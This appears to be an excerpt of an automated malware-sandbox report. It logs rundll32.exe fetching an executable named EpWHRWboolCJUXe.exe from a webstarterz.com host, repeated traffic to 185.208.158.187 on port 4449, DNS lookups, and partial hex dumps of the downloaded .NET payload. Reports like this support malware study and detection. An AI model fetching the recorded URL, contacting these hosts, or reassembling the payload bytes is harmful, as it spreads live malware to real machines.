                                Dec 10, 2024 14:23:31.547528028 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:23:31.547715902 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:23:31.667109966 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:23:45.448380947 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:23:45.567568064 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:23:45.567725897 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:23:45.686943054 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:23:45.997226000 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:23:46.041779995 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:23:46.189165115 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:23:46.192612886 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:23:46.312082052 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:23:46.312139988 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:23:46.432147980 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:24:00.217674017 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:24:00.343442917 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:24:00.343585014 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:24:00.512584925 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:24:00.811918974 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:24:00.854357958 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:24:01.002578974 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:24:01.004954100 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:24:01.124248981 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:24:01.124311924 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:24:01.245712042 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:24:08.479871988 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:24:08.599366903 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:24:08.599458933 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:24:08.721524954 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:24:09.028505087 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:24:09.073090076 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:24:09.220606089 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:24:09.222032070 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:24:09.341660023 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:24:09.341829062 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:24:09.461127043 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:24:23.246251106 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:24:23.366856098 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:24:23.367571115 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:24:23.487054110 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:24:23.796879053 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:24:23.854413033 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:24:23.989104986 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:24:23.991108894 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:24:24.110433102 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:24:24.110486984 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:24:24.230079889 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:24:38.011699915 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:24:38.130940914 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:24:38.131002903 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:24:38.250453949 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:24:38.562725067 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:24:38.604480028 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:24:38.776253939 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:24:38.778635979 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:24:38.898161888 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:24:38.898473024 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:24:39.017776012 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:24:52.651799917 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:24:52.771081924 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:24:52.771145105 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:24:52.890774965 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:24:53.200150013 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:24:53.276393890 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:24:53.392080069 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:24:53.394849062 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:24:53.514194012 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:24:53.514272928 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:24:53.633630991 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:02.324345112 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:02.443948984 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:02.444010019 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:02.563489914 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:02.877399921 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:03.065546989 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:03.065642118 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:03.067173958 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:03.186526060 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:03.186609983 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:03.307404041 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:05.391840935 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:05.511516094 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:05.511967897 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:05.732726097 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:05.942540884 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:06.088939905 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:06.152987003 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:06.154594898 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:06.274559975 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:06.274723053 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:06.394059896 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:10.214457035 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:10.333839893 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:10.334005117 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:10.453299999 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:10.774043083 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:10.888180017 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:10.966000080 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:10.967565060 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:11.086785078 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:11.086877108 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:11.206792116 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:24.982273102 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:25.102077961 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:25.102132082 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:25.222594976 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:25.532486916 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:25.636146069 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:25.730287075 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:25.732093096 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:25.851699114 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:25.851780891 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:25.971522093 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:27.027189016 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:27.146608114 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:27.146709919 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:27.266165018 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:27.624953985 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:27.667181969 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:27.864916086 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:27.880973101 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:28.001133919 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:28.002533913 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:28.122668982 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:33.339687109 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:33.462625980 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:33.462754965 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:33.582050085 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:33.892115116 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:33.932945967 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:34.084350109 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:34.090190887 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:34.210851908 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:34.211041927 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:34.330581903 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:36.044274092 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:36.163563967 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:36.164669037 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:36.283977985 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:36.593120098 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:36.635935068 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:36.785486937 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:36.787273884 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:36.906578064 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:36.908317089 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:37.027570963 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:41.402053118 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:41.521320105 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:41.521384001 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:41.640790939 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:41.960050106 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:42.011023045 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:42.151993990 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:42.200192928 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:44.071743011 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:44.190995932 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:44.191051960 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:44.310271025 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:44.622484922 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:44.667236090 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:44.814337969 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:44.815011978 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:44.934310913 CET444949756185.208.158.187192.168.2.7
                                Dec 10, 2024 14:25:44.934447050 CET497564449192.168.2.7185.208.158.187
                                Dec 10, 2024 14:25:45.053819895 CET444949756185.208.158.187192.168.2.7

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Dec 10, 2024 14:21:36.101058960 CET5108853192.168.2.71.1.1.1
                                Dec 10, 2024 14:21:37.154922009 CET5108853192.168.2.71.1.1.1
                                Dec 10, 2024 14:21:37.964509010 CET53510881.1.1.1192.168.2.7
                                Dec 10, 2024 14:21:37.964521885 CET53510881.1.1.1192.168.2.7

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Dec 10, 2024 14:21:36.101058960 CET192.168.2.71.1.1.10x8682Standard query (0)52575815-38-20200406120634.webstarterz.comA (IP address)IN (0x0001)false
                                Dec 10, 2024 14:21:37.154922009 CET192.168.2.71.1.1.10x8682Standard query (0)52575815-38-20200406120634.webstarterz.comA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Dec 10, 2024 14:21:37.964509010 CET1.1.1.1192.168.2.70x8682No error (0)52575815-38-20200406120634.webstarterz.com163.44.198.57A (IP address)IN (0x0001)false
                                Dec 10, 2024 14:21:37.964521885 CET1.1.1.1192.168.2.70x8682No error (0)52575815-38-20200406120634.webstarterz.com163.44.198.57A (IP address)IN (0x0001)false
                                Dec 10, 2024 14:21:55.895550013 CET1.1.1.1192.168.2.70xadd8No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                Dec 10, 2024 14:21:55.895550013 CET1.1.1.1192.168.2.70xadd8No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
                                Dec 10, 2024 14:21:55.895550013 CET1.1.1.1192.168.2.70xadd8No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false
                                Dec 10, 2024 14:21:55.895550013 CET1.1.1.1192.168.2.70xadd8No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                                Dec 10, 2024 14:21:55.895550013 CET1.1.1.1192.168.2.70xadd8No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.101A (IP address)IN (0x0001)false
                                Dec 10, 2024 14:22:39.580984116 CET1.1.1.1192.168.2.70x4b50No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                Dec 10, 2024 14:22:39.580984116 CET1.1.1.1192.168.2.70x4b50No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • 52575815-38-20200406120634.webstarterz.com

                                HTTPS Proxied Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.749700163.44.198.574435776C:\Windows\System32\rundll32.exe
                                TimestampBytes transferredDirectionData
                                2024-12-10 13:21:40 UTC111OUTGET /EpWHRWboolCJUXe.exe HTTP/1.1
                                Connection: Keep-Alive
                                Host: 52575815-38-20200406120634.webstarterz.com
                                2024-12-10 13:21:40 UTC252INHTTP/1.1 200 OK
                                Date: Tue, 10 Dec 2024 13:21:40 GMT
                                Server: Apache
                                Last-Modified: Tue, 10 Dec 2024 05:41:54 GMT
                                ETag: "a3a08-628e3f052d239"
                                Accept-Ranges: bytes
                                Content-Length: 670216
                                Connection: close
                                Content-Type: application/x-msdownload
                                2024-12-10 13:21:41 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9c 8c 4e bc 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 fa 09 00 00 08 00 00 00 00 00 00 0e 18 0a 00 00 20 00 00 00 20 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELN0 @ `@
                                2024-12-10 13:21:41 UTC16384INData Raw: 00 03 6f a1 00 00 0a 00 2a 3a 00 02 73 67 00 00 06 28 36 00 00 06 00 2a 0a 00 2a 3a 00 02 73 19 00 00 06 28 36 00 00 06 00 2a 3a 00 02 73 01 00 00 06 28 36 00 00 06 00 2a 3a 00 02 73 56 00 00 06 28 36 00 00 06 00 2a 3a 00 02 73 3f 00 00 06 28 36 00 00 06 00 2a 00 13 30 02 00 2b 00 00 00 04 00 00 11 00 03 2c 0b 02 7b 4e 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0e 00 02 7b 4e 00 00 04 6f 34 00 00 0a 00 00 02 03 28 35 00 00 0a 00 2a 00 13 30 06 00 0d 0e 00 00 07 00 00 11 00 d0 08 00 00 02 28 36 00 00 0a 73 37 00 00 0a 0a 02 73 39 00 00 0a 7d 4f 00 00 04 02 73 3a 00 00 0a 7d 57 00 00 04 02 73 3a 00 00 0a 7d 58 00 00 04 02 73 3a 00 00 0a 7d 59 00 00 04 02 73 3a 00 00 0a 7d 5a 00 00 04 02 73 3a 00 00 0a 7d 5b 00 00 04 02 73 10 00 00 06 7d 5c 00 00 04 02 73 10 00 00
                                Data Ascii: o*:sg(6**:s(6*:s(6*:sV(6*:s?(6*0+,{N+,{No4(5*0(6s7s9}Os:}Ws:}Xs:}Ys:}Zs:}[s}\s
                                2024-12-10 13:21:41 UTC16384INData Raw: 00 0a 00 02 7b 8d 00 00 04 72 2a 1d 00 70 6f 6d 00 00 0a 00 02 7b 8d 00 00 04 72 8e 15 00 70 6f 6e 00 00 0a 00 02 7b 8e 00 00 04 1c 6f 6c 00 00 0a 00 02 7b 8e 00 00 04 72 42 1d 00 70 6f 6d 00 00 0a 00 02 7b 8e 00 00 04 72 b6 15 00 70 6f 6e 00 00 0a 00 02 7b 8e 00 00 04 1f 50 6f 6f 00 00 0a 00 02 22 00 00 c0 40 22 00 00 50 41 73 72 00 00 0a 28 73 00 00 0a 00 02 17 28 74 00 00 0a 00 02 28 ea 00 00 0a 6f 41 00 00 0a 00 02 20 12 04 00 00 20 34 02 00 00 73 4a 00 00 0a 28 75 00 00 0a 00 02 28 42 00 00 0a 02 7b 86 00 00 04 6f 43 00 00 0a 00 02 28 42 00 00 0a 02 7b 81 00 00 04 6f 43 00 00 0a 00 02 28 42 00 00 0a 02 7b 7e 00 00 04 6f 43 00 00 0a 00 02 16 28 76 00 00 0a 00 02 72 54 1d 00 70 28 49 00 00 0a 00 02 1a 28 90 00 00 0a 00 02 72 54 1d 00 70 6f 2c 00 00 0a
                                Data Ascii: {r*pom{rpon{ol{rBpom{rpon{Poo"@"PAsr(s(t(oA 4sJ(u(B{oC(B{oC(B{~oC(vrTp(I(rTpo,
                                2024-12-10 13:21:41 UTC16384INData Raw: 13 01 00 00 04 01 00 00 f1 00 fa 00 84 00 01 00 9d 0f 87 04 01 00 25 04 8b 04 01 00 b0 11 8f 04 01 00 f1 17 93 04 01 00 9e 00 97 04 01 00 ce 00 9b 04 01 00 23 03 9b 04 01 00 97 00 9f 04 01 00 04 1c a3 04 01 00 fd 01 a7 04 01 00 c6 00 a7 04 01 00 5e 01 a7 04 01 00 08 19 ab 04 01 00 61 08 ab 04 01 00 9d 0f 87 04 01 00 25 04 8b 04 01 00 f1 17 93 04 01 00 9e 00 97 04 01 00 15 08 af 04 01 00 97 00 9f 04 06 00 1e 04 9f 04 06 00 8d 11 b3 04 06 00 2d 08 b3 04 06 00 87 0a b3 04 06 00 1c 07 b8 04 01 00 3d 01 9f 04 01 00 88 05 bd 04 01 00 94 05 bd 04 01 00 f1 17 93 04 01 00 9d 0f 87 04 01 00 25 04 8b 04 01 00 b0 11 8f 04 01 00 f1 17 93 04 01 00 a5 12 a3 04 01 00 9e 00 97 04 01 00 23 03 9b 04 01 00 97 00 9f 04 01 00 fd 01 a7 04 01 00 c6 00 a7 04 01 00 5e 01 a7 04 01
                                Data Ascii: %#^a%-=%#^
                                2024-12-10 13:21:41 UTC16384INData Raw: 6c 00 65 00 00 11 34 00 37 00 37 00 33 00 36 00 37 00 36 00 32 00 00 0d 36 00 43 00 36 00 36 00 36 00 33 00 00 29 49 00 6e 00 76 00 65 00 6e 00 74 00 6f 00 72 00 79 00 5f 00 4d 00 61 00 6e 00 61 00 67 00 65 00 6d 00 65 00 6e 00 74 00 00 05 43 00 72 00 00 05 65 00 61 00 00 05 74 00 65 00 00 07 49 00 6e 00 73 00 00 07 74 00 61 00 6e 00 00 05 63 00 65 00 00 21 45 00 78 00 69 00 74 00 20 00 41 00 70 00 70 00 6c 00 69 00 63 00 61 00 74 00 69 00 6f 00 6e 00 00 7d 53 00 65 00 6c 00 65 00 63 00 74 00 20 00 2a 00 20 00 66 00 72 00 6f 00 6d 00 20 00 74 00 62 00 6c 00 55 00 73 00 65 00 72 00 73 00 20 00 77 00 68 00 65 00 72 00 65 00 20 00 75 00 73 00 65 00 72 00 6e 00 61 00 6d 00 65 00 3d 00 40 00 75 00 73 00 65 00 72 00 20 00 61 00 6e 00 64 00 20 00 70 00 61 00 73
                                Data Ascii: le477367626C6663)Inventory_ManagementCreateInstance!Exit Application}Select * from tblUsers where username=@user and pas
                                2024-12-10 13:21:42 UTC16384INData Raw: 4a 79 ad a0 97 4d a1 e8 25 cb 50 cb e0 36 34 2b 3f 80 5e a2 d7 5f 63 dc 66 ba 9d f4 b2 a9 d7 e8 99 d1 cb 50 8d 1c ee a4 7d bb 8d d6 c3 6c 4e f4 7e 62 c8 5b 4d cf 64 e7 21 36 37 fa 4b 69 6b 5f 53 05 77 31 39 de 41 df d8 83 f6 42 5d 74 52 ed 8a 6b 75 a9 bd 58 77 81 4d 54 47 b3 58 4d 00 b3 87 d6 be a3 b5 c1 32 b4 8d 79 0f 5a 4f af 23 fd 53 8d 7e 7e 0e 2d 4f b5 b2 d3 a2 68 07 36 33 c1 cc 66 7f 00 01 18 3a a8 d7 c3 d2 fe 00 00 00 00 49 45 4e 44 ae 42 60 82 0b 00 00 00 9a 03 00 00 ce ca ef be 01 00 00 00 91 00 00 00 6c 53 79 73 74 65 6d 2e 52 65 73 6f 75 72 63 65 73 2e 52 65 73 6f 75 72 63 65 52 65 61 64 65 72 2c 20 6d 73 63 6f 72 6c 69 62 2c 20 56 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 75 74 72 61 6c 2c 20 50 75 62 6c 69
                                Data Ascii: JyM%P64+?^_cfP}lN~b[Md!67Kik_Sw19AB]tRkuXwMTGXM2yZO#S~~-Oh63f:IENDB`lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, Publi
                                2024-12-10 13:21:42 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Data Ascii:
                                2024-12-10 13:21:42 UTC16384INData Raw: cc f0 ab 6d 4c 77 70 54 8a 2b 8b ba 84 4a 26 33 45 d1 86 f2 46 9a 34 7e 87 9d 34 2a 8f e1 2a 45 68 68 8e 0c b1 75 ee a3 36 da 15 77 95 4a 74 1a b5 d9 48 4b dd 2d 68 8c b6 f6 5d e5 92 9c c7 dc a8 57 4a d8 26 ad a3 59 7a e3 c6 c3 bf d1 fb 09 d7 c8 d8 7e e1 28 3a e5 26 5c 63 63 ba 86 ce 51 f7 69 e3 d8 35 38 86 27 98 fb 80 d7 65 0f 4a 79 ad a0 97 4d a1 e8 25 cb 50 cb e0 36 34 2b 3f 80 5e a2 d7 5f 63 dc 66 ba 9d f4 b2 a9 d7 e8 99 d1 cb 50 8d 1c ee a4 7d bb 8d d6 c3 6c 4e f4 7e 62 c8 5b 4d cf 64 e7 21 36 37 fa 4b 69 6b 5f 53 05 77 31 39 de 41 df d8 83 f6 42 5d 74 52 ed 8a 6b 75 a9 bd 58 77 81 4d 54 47 b3 58 4d 00 b3 87 d6 be a3 b5 c1 32 b4 8d 79 0f 5a 4f af 23 fd 53 8d 7e 7e 0e 2d 4f b5 b2 d3 a2 68 07 36 33 c1 cc 66 7f 00 01 18 3a a8 d7 c3 d2 fe 00 00 00 00 49
                                Data Ascii: mLwpT+J&3EF4~4**Ehhu6wJtHK-h]WJ&Yz~(:&\ccQi58'eJyM%P64+?^_cfP}lN~b[Md!67Kik_Sw19AB]tRkuXwMTGXM2yZO#S~~-Oh63f:I
                                2024-12-10 13:21:42 UTC16384INData Raw: 0b c4 20 2a b0 05 bc 63 46 08 fa 0e 52 25 2d 78 c2 08 f2 95 a0 a1 9b 91 ff 13 f0 20 a0 e8 4a b4 9a 98 c8 61 90 2b 55 b7 07 b3 dc 97 11 35 c7 10 07 9c 67 44 10 fb da b2 9f 00 6b 60 02 c5 3c ff 00 03 33 cd 5a f9 49 3c ff 86 00 46 0c be 9d 33 b1 57 29 59 4e a0 d2 e0 fe 5f c9 b3 30 e3 b9 83 cf 0b 59 b9 2f 2a b1 05 86 33 f7 a5 20 2b 37 bb 72 a0 71 67 f8 4a 0c cc 99 32 4a 0e 44 dd 9a ac d0 8f a2 f4 14 93 76 50 e6 46 54 9a 7c fd 38 fe 8e dc 57 86 19 9e 0a b3 5b 6e 51 a0 2b 1f 20 45 bf b2 f9 82 bf 53 31 58 de c5 20 4a 61 46 65 c0 f8 db ec 66 d6 d3 f5 6e 02 33 83 c1 f5 4e 6f ab 9f cd 41 06 93 3d be 1e b1 6c 7c 0d c7 1a 80 ff 4a 69 4d 4f 13 3b 92 67 a1 c0 6a 06 3c 88 2c 0a e3 34 58 39 06 83 32 92 c9 c1 7c 04 59 89 3a 34 c7 95 97 15 30 24 3b 4f 34 75 ab 80 a1 f1 5f
                                Data Ascii: *cFR%-x Ja+U5gDk`<3ZI<F3W)YN_0Y/*3 +7rqgJ2JDvPFT|8W[nQ+ ES1X JaFefn3NoA=l|JiMO;gj<,4X92|Y:40$;O4u_
